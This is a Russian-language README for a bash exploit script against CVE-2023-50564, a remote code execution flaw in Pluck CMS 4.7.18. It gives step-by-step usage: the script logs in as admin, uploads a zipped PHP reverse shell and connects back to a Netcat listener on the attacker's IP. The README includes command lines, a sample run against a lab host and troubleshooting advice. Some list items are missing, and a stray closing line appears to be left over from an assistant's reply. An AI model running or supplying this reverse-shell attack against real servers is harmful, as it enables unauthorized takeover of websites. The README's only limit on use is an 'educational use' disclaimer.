
Refurbish exploit in bash
Этот скрипт эксплуатирует уязвимость удалённого выполнения кода (RCE) в Pluck CMS v4.7.18. Уязвимость позволяет злоумышленнику загрузить вредоносный PHP-файл на сервер и выполнить его, получив удалённое выполнение команд на целевой машине.
Скрипт автоматизирует весь процесс:
Примечание: Для получения reverse shell на машине атакующего должен быть запущен Netcat-слушатель.
Перед запуском скрипта убедитесь в следующем:
./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <port>
-h <host> — Целевой хост (например, greenhorn.htb).-P <password> — Пароль для панели администратора Pluck CMS (например, abcd123).-i <IP> — IP-адрес атакующего для получения reverse shell.-p <port> — Порт, на котором запущен Netcat-слушатель для захвата reverse shell../CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Настройте Netcat-слушатель: На машине атакующего запустите Netcat-слушатель на указанном порту:
nc -nvlp <port>
Например:
nc -nvlp 9001
Запустите скрипт: Передайте скрипту необходимые параметры, включая хост, пароль, IP-адрес и порт.
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Выполнение скрипта:
love.php)."RCE is waiting for you, please go take a look.", и скрипт завершается, фиксируя затраченное время.Доступ к цели: Как только reverse shell активирован, соединение появится в вашем Netcat-слушателе, предоставляя удалённый доступ к целевой машине.
изображение
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.
Если они не установлены, вы можете установить curl и netcat с помощью следующих команд:
sudo apt update
sudo apt install curl netcat
sudo yum install curl nc
Этот скрипт предназначен только для образовательных целей и авторизованного тестирования на проникновение. Несанкционированное использование скрипта незаконно и неэтично. Всегда получайте соответствующее разрешение перед эксплуатацией любой уязвимости в системе.
504 Gateway Time-out: Скрипт может столкнуться с этой ошибкой при попытке выполнить reverse shell, но это не влияет на успешность выполнения shell. Ошибка обычно возникает из-за того, что целевой сервер слишком долго отвечает на HTTP-запрос, но shell всё равно должен сработать.
Проблемы с Netcat-слушателем: Если вы не получили reverse shell, убедитесь, что ваш IP-адрес и порт установлены правильно, и что нет ограничений брандмауэра, препятствующих подключению цели к вашей машине.
Скрипт не может войти: Если вход в панель администратора CMS не удаётся, проверьте предоставленный пароль и убедитесь, что CMS доступна на целевой машине.
Дайте знать, если потребуются дополнительные изменения или разъяснения в README!